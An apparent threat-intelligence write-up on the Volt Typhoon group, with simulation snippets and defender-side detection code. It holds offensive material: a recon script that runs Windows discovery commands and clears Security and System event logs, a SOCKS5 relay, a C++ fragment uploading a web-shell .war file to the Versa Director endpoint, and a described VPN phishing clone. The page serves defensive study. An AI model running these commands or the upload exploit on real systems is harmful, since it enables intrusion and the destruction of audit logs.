Volt Typhoon

Origin: China (PRC) — State-Sponsored

Aliases: BRONZE SILHOUETTE, Vanguard Panda, DEV-0391, Insidious Taurus

Active Since: Mid-2021 (publicly attributed May 2023)

Targets: US Critical Infrastructure — Communications, Energy, Water, Transportation

Focus Areas: Living off the Land, Pre-positioning, SOHO Device Exploitation

Overview

FBI Director Christopher Wray called Volt Typhoon "the defining threat of our generation." Unlike ransomware groups or data thieves, Volt Typhoon has a single goal: quietly embed themselves inside US critical infrastructure networks and wait. No data exfiltration, no ransom notes — just pre-positioned access that can be activated during a geopolitical crisis.

What makes them genuinely different from every other APT is their discipline. They use zero custom malware. Every action is performed through built-in operating system tools — cmd.exe, wmic, netsh, PowerShell. There are no IOCs to signature on. This forced me to fundamentally rethink how detection works when every artifact looks exactly like legitimate admin activity.


MITRE ATT&CK Mapping

| Tactic | Technique | Simulation Tool |
|---|---|---|
| Initial Access | T1190 — Exploit Public-Facing Application (Versa Director CVE-2024-39717) | versa_director_exploit.cpp |
| Initial Access | T1566.002 — Spearphishing Link (FortiGate VPN credential phishing) | fortigate_phish/ |
| Execution | T1059.001 — PowerShell (LOTL discovery commands) | lotl_discovery.ps1 |
| Discovery | T1082 / T1049 / T1016 — System, Network, and Config Discovery | lotl_recon.py |
| Command & Control | T1090.002 — SOCKS5 Proxy via KV-Botnet | kv_botnet_proxy.py |
| Defense Evasion | T1562.001 — Disable Security Tools (wevtutil log clearing) | lotl_recon.py |

Living off the Land: The Recon Module

The simulation's recon module calls the exact same binaries a sysadmin would use — systeminfo, netstat, ipconfig, wevtutil, wmic. There's nothing to detect based on the individual commands. But the pattern matters: running systeminfo, then immediately dumping the DNS cache, then querying security products via WMI, then clearing specific event logs — that behavioral sequence is what detection has to key on.

```python
import subprocess

exfil_data = {}

# Every entry is a stock Windows binary; nothing here is custom tooling.
recon_commands = [
    ("systeminfo", "System information"),
    ("ipconfig /all", "Network configuration"),
    ("netstat -ano", "Active connections"),
    ("net user", "Local user accounts"),
    ("net localgroup administrators", "Admin group members"),
    ("wmic process list brief", "Running processes"),
    ("wmic service list brief", "Installed services"),
    ("netsh advfirewall show allprofiles", "Firewall status"),
    ("wevtutil cl Security", "Clear security logs"),  # Defense evasion
    ("wevtutil cl System", "Clear system logs"),
]

for cmd, description in recon_commands:
    result = subprocess.run(cmd, capture_output=True, text=True, shell=True)
    exfil_data[description] = result.stdout[:2000]  # cap each result at 2 KB
```

Building this taught me why behavioral detection (UEBA) is essential for LOTL threats. Traditional SIEM rules that alert on individual commands would fire on every sysadmin doing morning checks. You need temporal correlation — a rule that triggers when 5+ native discovery commands run in sequence within 60 seconds from the same session, especially combined with log clearing.
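The temporal-correlation rule described above, written out as a detection function over process-creation records. This is an added example, not the page's simulation code or any vendor's rule: the record layout (timestamp | logon session id | image path | command line), the session ids and the timestamps are constructed for the example, while the threshold and window are the paragraph's own values (five native discovery commands within 60 seconds of one session, with wevtutil log clearing in or just after the window raising severity).

```python
"""Temporal correlation of native discovery commands (added, constructed example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Native binaries whose use in a burst is the signal. Matching is on the image
# name, so command-line obfuscation does not change the verdict.
DISCOVERY_BINARIES = {"systeminfo.exe", "ipconfig.exe", "netstat.exe", "net.exe",
                      "net1.exe", "wmic.exe", "netsh.exe"}
LOG_CLEAR_BINARY = "wevtutil.exe"

# Constructed process-creation records (shape of a minimal 4688 / Sysmon Event 1 export):
# timestamp | logon session id | image | command line
SAMPLE_EVENTS = """\
2024-06-03T08:01:02Z|0x3e7a1|C:\\Windows\\System32\\systeminfo.exe|systeminfo
2024-06-03T08:01:05Z|0x3e7a1|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all
2024-06-03T08:01:09Z|0x3e7a1|C:\\Windows\\System32\\netstat.exe|netstat -ano
2024-06-03T08:01:14Z|0x3e7a1|C:\\Windows\\System32\\net.exe|net user
2024-06-03T08:01:20Z|0x3e7a1|C:\\Windows\\System32\\wbem\\wmic.exe|wmic process list brief
2024-06-03T08:01:31Z|0x3e7a1|C:\\Windows\\System32\\wevtutil.exe|wevtutil cl Security
2024-06-03T09:15:00Z|0x51c02|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all
2024-06-03T09:40:00Z|0x51c02|C:\\Windows\\System32\\netstat.exe|netstat -ano
"""


def parse_events(text):
    """Turn the pipe-delimited export into dicts with parsed timestamps and bare image names."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, session, image, cmdline = line.split("|", 3)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "session": session,
            "image": image.rsplit("\\", 1)[-1].lower(),
            "cmdline": cmdline,
        })
    return events


def detect_discovery_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """One alert per logon session whose discovery commands reach `threshold`
    inside a sliding `window`. A wevtutil cl in or shortly after that window
    marks the alert high severity: recon followed by log clearing."""
    by_session = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_session[ev["session"]].append(ev)

    alerts = []
    for session, evs in by_session.items():
        disc = [e for e in evs if e["image"] in DISCOVERY_BINARIES]
        clears = [e for e in evs if e["image"] == LOG_CLEAR_BINARY
                  and e["cmdline"].lower().startswith("wevtutil cl")]
        start = 0
        for end in range(len(disc)):
            # Shrink the window from the left until it spans at most `window`.
            while disc[end]["ts"] - disc[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                win_start, win_end = disc[start]["ts"], disc[end]["ts"]
                cleared = [c["cmdline"] for c in clears
                           if win_start <= c["ts"] <= win_end + window]
                alerts.append({
                    "session": session,
                    "count": end - start + 1,
                    "first": win_start,
                    "last": win_end,
                    "log_clearing": cleared,
                    "severity": "high" if cleared else "medium",
                })
                break  # one alert per session is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_discovery_bursts(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The second session in the sample runs two discovery commands 25 minutes apart and produces nothing, which is the point of the window: the rule fires on density, not on the presence of any one binary.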


KV-Botnet: SOCKS5 Proxy Infrastructure

Volt Typhoon routes all C2 traffic through compromised SOHO routers — Cisco RV320s, Netgear ProSAFEs, DrayTek Vigor devices. They deployed the KV-Botnet, which turns these routers into SOCKS5 proxy nodes. The traffic appears to originate from a legitimate small business router, making it nearly impossible to block by IP reputation.

I implemented a full RFC 1928 SOCKS5 proxy to understand how this works at the protocol level. The three-phase handshake is straightforward but the details were revealing:

```python
import socket
import struct

# Phase 1: client greeting advertises the auth methods it supports.
# VER (0x05 = SOCKS5) | NMETHODS | METHOD_LIST
greeting = struct.pack('!BBB', 0x05, 0x01, 0x00)  # one method: no auth (0x00)

# Phase 2: the server replies with the method it selected.
# VER | METHOD   (`response` is the two bytes read back from the server)
ver, method = struct.unpack('!BB', response[:2])

# Phase 3: connection request, parsed here on the proxy side.
# VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT   (`header` is the first 4 bytes read)
ver, cmd, rsv, atype = struct.unpack('!BBBB', header[:4])
if atype == 0x01:    # IPv4: fixed 4 bytes
    addr = socket.inet_ntoa(self.request.recv(4))
elif atype == 0x03:  # Domain name: 1-byte length prefix, then the name
    domain_len = self.request.recv(1)[0]
    addr = self.request.recv(domain_len).decode()
elif atype == 0x04:  # IPv6: fixed 16 bytes
    addr = socket.inet_ntop(socket.AF_INET6, self.request.recv(16))
else:
    raise ValueError(f"unsupported ATYP {atype:#x}")
port = struct.unpack('!H', self.request.recv(2))[0]

# Establish the upstream connection and relay bytes in both directions.
remote = socket.create_connection((addr, port))
self._relay_traffic(self.request, remote)
```

The key insight: when you're a network defender and you see SOCKS5 traffic coming from a legitimate edge device, there's nothing inherently suspicious about it. You need to correlate traffic patterns — long-lived tunnel sessions with periodic low-volume beaconing — and cross-reference with threat feeds tracking known compromised SOHO devices. This is exactly why CISA pushed the "Secure by Design" initiative for router manufacturers.
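To make the sensor's side of this concrete, here is an added, defender-side example (not the author's kv_botnet_proxy.py and not from RFC 1928 itself) that passively decodes a constructed SOCKS5 exchange, client greeting, server method selection and CONNECT request with all three address types and truncation handling, and then applies the long-lived, low-volume session heuristic from the paragraph above to constructed flow summaries. The hostname, the addresses, the byte counts and the duration and rate thresholds are all assumptions chosen for the example.

```python
"""Passive SOCKS5 decoding and tunnel-session triage (added, constructed example)."""
import ipaddress
import struct
from dataclasses import dataclass

SOCKS_VERSION = 0x05
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}


@dataclass
class ConnectRequest:
    cmd: str
    atyp: int
    dst_addr: str
    dst_port: int


def parse_client_greeting(data):
    """VER | NMETHODS | METHODS. Returns the offered methods, or None if this is not SOCKS5."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    nmethods = data[1]
    if nmethods == 0 or len(data) < 2 + nmethods:
        return None  # malformed, or the capture is truncated
    return list(data[2:2 + nmethods])


def parse_server_choice(data):
    """VER | METHOD. 0xFF means the server refused every offered method."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    return data[1]


def parse_connect_request(data):
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT, covering all three ATYP encodings."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    _, cmd, _, atyp = struct.unpack("!BBBB", data[:4])
    off = 4
    if atyp == 0x01:            # IPv4, fixed 4 bytes
        addr_len = 4
    elif atyp == 0x04:          # IPv6, fixed 16 bytes
        addr_len = 16
    elif atyp == 0x03:          # domain name, 1-byte length prefix
        if len(data) < 5:
            raise ValueError("truncated request")
        addr_len = data[off]
        off += 1
    else:
        raise ValueError(f"unsupported ATYP {atyp:#x}")
    if len(data) < off + addr_len + 2:
        raise ValueError("truncated request")
    raw = data[off:off + addr_len]
    if atyp == 0x01:
        addr = str(ipaddress.IPv4Address(raw))
    elif atyp == 0x04:
        addr = str(ipaddress.IPv6Address(raw))
    else:
        addr = raw.decode("ascii", errors="replace")
    port = struct.unpack("!H", data[off + addr_len:off + addr_len + 2])[0]
    return ConnectRequest(CMD_NAMES.get(cmd, f"{cmd:#x}"), atyp, addr, port)


# Constructed exchange, as a sensor between the relay node and the proxy would see it.
_DOMAIN = b"intranet.example.internal"
CLIENT_GREETING = bytes([SOCKS_VERSION, 0x01, 0x00])              # offers "no auth" only
SERVER_CHOICE = bytes([SOCKS_VERSION, 0x00])                      # server accepts it
CLIENT_CONNECT = (bytes([SOCKS_VERSION, 0x01, 0x00, 0x03, len(_DOMAIN)])
                  + _DOMAIN + struct.pack("!H", 443))
SERVER_REPLY = bytes([SOCKS_VERSION, 0x00, 0x00, 0x01]) + bytes(4) + struct.pack("!H", 0)


@dataclass
class Flow:
    src: str            # the edge device as seen by the sensor
    dst: str
    dport: int
    duration_s: int
    bytes_total: int


# Constructed flow summaries. Only the first has the tunnel shape: hours long,
# a few hundred bytes a minute. The others are a short download and a bulk transfer.
SAMPLE_FLOWS = [
    Flow("203.0.113.7", "10.20.0.15", 443, duration_s=14_400, bytes_total=96_000),
    Flow("203.0.113.7", "10.20.0.15", 443, duration_s=40, bytes_total=5_500_000),
    Flow("198.51.100.23", "10.20.0.40", 443, duration_s=7_200, bytes_total=900_000_000),
]


def flag_long_lived_low_volume(flows, min_duration_s=3_600, max_bytes_per_min=2_048):
    """Sessions that stay up for a long time yet move little data: the shape a
    relayed beacon produces. Real triage would also check `src` against feeds
    of known-compromised SOHO devices, which this example does not model."""
    flagged = []
    for f in flows:
        if f.duration_s < min_duration_s:
            continue
        if f.bytes_total / (f.duration_s / 60) <= max_bytes_per_min:
            flagged.append(f)
    return flagged
```

Note that the greeting parser rejects a TLS ClientHello (first byte 0x16) outright: version-byte plus length-consistency checks are what keep a passive SOCKS5 detector from misfiring on every other protocol that shares the port.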


Versa Director CVE-2024-39717

In mid-2024, Volt Typhoon exploited a zero-day in Versa Director — the management platform used by ISPs and MSPs to orchestrate SD-WAN infrastructure. The vulnerability was in an unrestricted file upload endpoint in the /vnms/devicereg/uploadFileToDevice path. By uploading a specially crafted Java servlet (a .war file containing a web shell), they gained code execution on the management server — which controls the entire SD-WAN fabric.

The C++ exploit simulation crafts the multipart HTTP request, uploads the malicious servlet, and interacts with the resulting web shell. What made this attack devastating wasn't the technical complexity — it was the target selection. Compromising a Versa Director instance gave them access to every downstream network managed through that SD-WAN.

```cpp
#include <string>
#include <curl/curl.h>

// Construct multipart form data for the .war file upload
std::string boundary = "----WebKitFormBoundary" + generate_random(16);
std::string body =
    "--" + boundary + "\r\n"
    "Content-Disposition: form-data; name=\"file\"; "
    "filename=\"updates.war\"\r\n"
    "Content-Type: application/octet-stream\r\n\r\n" +
    war_payload + "\r\n--" + boundary + "--\r\n";

// Upload to the unrestricted endpoint
curl_easy_setopt(curl, CURLOPT_URL,
                 "https://target:9183/vnms/devicereg/uploadFileToDevice");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, body.c_str());
```
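The body built by the snippet above is exactly what the receiving handler has to judge. Here is an added example, in Python rather than the simulation's C++ and neither the page's nor Versa's code, that parses such a multipart body and contrasts the unrestricted behaviour (trust the client's filename, store the bytes) with the checks a hardened upload handler applies: an extension allowlist, a hard reject for servlet and archive types, a magic-byte check against the declared type, stripping of path components and a size limit. The allowlisted types, the magic values used for sniffing, the boundary string and the stub payloads are assumptions constructed for the example.

```python
"""Multipart upload inspection: unrestricted acceptance vs. hardened validation
(added, constructed example)."""
import posixpath
import re

# Assumed: a branding/image endpoint legitimately accepts only these types.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".ico": b"\x00\x00\x01\x00",
}
ALLOWED_EXTENSIONS = set(MAGIC)
# Types that must never reach a servlet container's deploy path, whatever the allowlist says.
SERVLET_EXTENSIONS = {".war", ".jar", ".jsp", ".jspx", ".class"}


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (headers dict, content bytes) parts."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter
        chunk = chunk.lstrip(b"\r\n")
        head, _, content = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        if content.endswith(b"\r\n"):
            content = content[:-2]  # CRLF that precedes the next delimiter
        parts.append((headers, content))
    return parts


def upload_filename(headers):
    match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    return match.group(1) if match else None


def vulnerable_accept(part):
    """The unrestricted behaviour: the client's filename decides where the bytes land."""
    headers, content = part
    return upload_filename(headers), len(content)


def hardened_validate(part, max_bytes=1_000_000):
    """Return (accepted, safe_filename_or_reason) after the checks an upload handler needs."""
    headers, content = part
    name = upload_filename(headers)
    if not name:
        return False, "missing filename"
    safe = posixpath.basename(name.replace("\\", "/"))  # drop any path components
    ext = posixpath.splitext(safe)[1].lower()
    if ext in SERVLET_EXTENSIONS:
        return False, f"servlet/archive type rejected: {ext}"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension not in allowlist: {ext or '<none>'}"
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    if len(content) > max_bytes:
        return False, "too large"
    return True, safe


def build_body(boundary, filename, content, ctype="application/octet-stream"):
    """Constructed test input laid out like the upload request above."""
    head = (f"--{boundary}\r\nContent-Disposition: form-data; name=\"file\"; "
            f"filename=\"{filename}\"\r\nContent-Type: {ctype}\r\n\r\n")
    return head.encode() + content + f"\r\n--{boundary}--\r\n".encode()


BOUNDARY = "----WebKitFormBoundaryConstructed00"
WAR_STUB = b"PK\x03\x04" + b"\x00" * 26        # zip local-header magic only; not a real archive
PNG_STUB = MAGIC[".png"] + b"\x00" * 16         # PNG signature only; not a real image

if __name__ == "__main__":
    for fname, payload, ctype in [("updates.war", WAR_STUB, "application/octet-stream"),
                                  ("logo.png", PNG_STUB, "image/png"),
                                  ("logo.png", WAR_STUB, "image/png")]:
        part = parse_multipart(build_body(BOUNDARY, fname, payload, ctype), BOUNDARY)[0]
        print(fname, "unrestricted:", vulnerable_accept(part), "hardened:", hardened_validate(part))
```

The third case, an archive renamed to logo.png, is why the extension allowlist alone is not enough: the magic-byte check is what catches a servlet hidden behind an innocent name, and the basename step is what stops a filename from choosing its own directory.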

FortiGate VPN Credential Phishing

Volt Typhoon also uses targeted credential phishing against network administrators. The simulation includes a pixel-perfect clone of the FortiGate SSL-VPN login portal, complete with proper CSS, the Fortinet logo, and JavaScript validation. Captured credentials are logged server-side and the victim is redirected to the real VPN portal with a "session expired" message — they log in again on the real page and never realize anything happened.

This technique is effective because VPN login pages are inherently expected by users. A typosquat domain like vpn-fortinet-corp.com sent from a spoofed IT department email is all it takes. The simulation demonstrates why MFA on VPN infrastructure is non-negotiable.


Detection Guidance

Key Challenge: Volt Typhoon generates zero malware artifacts. Detection must be entirely behavioral — command sequence analysis, anomalous SOCKS5 tunnels from edge devices, and correlation of admin tool usage with threat intelligence on compromised SOHO infrastructure.

What to hunt for:

1. Multiple native discovery commands (systeminfo, netstat, wmic) executed in rapid succession from a single session
2. Event log clearing (wevtutil cl) following reconnaissance activity
3. Long-duration SOCKS5 connections from SOHO devices to internal infrastructure
4. Unusual inbound connections to SD-WAN management platforms
5. VPN authentication attempts from IPs associated with residential proxy networks

Full simulation code available on GitHub.